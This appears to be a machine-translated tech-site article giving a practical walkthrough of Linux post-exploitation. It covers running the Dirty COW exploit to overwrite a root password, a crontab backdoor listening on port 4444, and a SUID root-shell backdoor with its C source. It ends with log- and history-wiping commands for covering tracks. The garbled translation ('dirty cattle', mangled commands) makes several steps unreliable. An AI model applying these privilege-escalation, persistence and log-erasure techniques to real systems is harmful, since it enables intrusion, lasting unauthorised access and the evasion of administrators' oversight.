Shulou(Shulou.com)06/03 Report--

This article introduces the relevant knowledge of "how to use power enhancement and backdoor implantation in intranet penetration". In the operation of actual cases, many people will encounter such a dilemma. Next, let the editor lead you to learn how to deal with these situations! I hope you can read it carefully and be able to achieve something!

Linux promotion and backdoor implant 1. Reappearance of loopholes in dirty cattle

(1) go to the web page and copy down the code in dirty.c, then touch (create) a .c file, open vi or vim, and copy the code to save it.

(https://github.com/FireFart/dirtycow/blob/master/dirty.c cannot be downloaded directly from kali by wget, as this will download the entire web page (in person).)

(2) enter shell and download from the apache service opened by kali

(3) compile 1.c file

Gcc-pthread 1.c-o dirty-lcrypt compile .c file

(4) execution document

. / dirty |. / dirty custom password

Remember to overwrite the backup password.bak after testing.

(5) switch the rewritten administrator account (successfully elevate the rights)

2. Crontab schedule tasks

(1) vim / etc/crontab is edited (only if it has administrator permission)

(2) Port 4444 is running after restart

(3) can be controlled

3. Suid raises the right (if the right is successfully raised once, it is equivalent to keeping the right to stay at the back door)

(1) create a suid.c file (because the target machine is too difficult to edit, so I use wget to download it after kali editing)

# include main () {setuid (0); system ("/ bin/bash");}

(2) download suid with wget

(3) gcc compiles suid.c files

Gcc suid.c-o suid

(4) permission to modify suid (give the file to the person who executes the file as an administrator to change the file)

(5) the rebooted target machine can directly execute. / suid to lift rights (no password is required)

4. Linux trace removal

(1) Clean only the current user: history-c

(2) make the system no longer save the command record: vi / etc/profile, find the value of HISTSIZE, and change it to 0

Delete record

(3) Delete login failure record: echo > / var/log/btmp

(4) Delete login success record: echo > / var/log/wtmp (if you execute the last command at this time, you will find that there is no record)

(5) Delete log records: echo > / var/log/secure

This is the end of the content of "how to use Intranet Penetration and backdoor implantation". Thank you for your reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.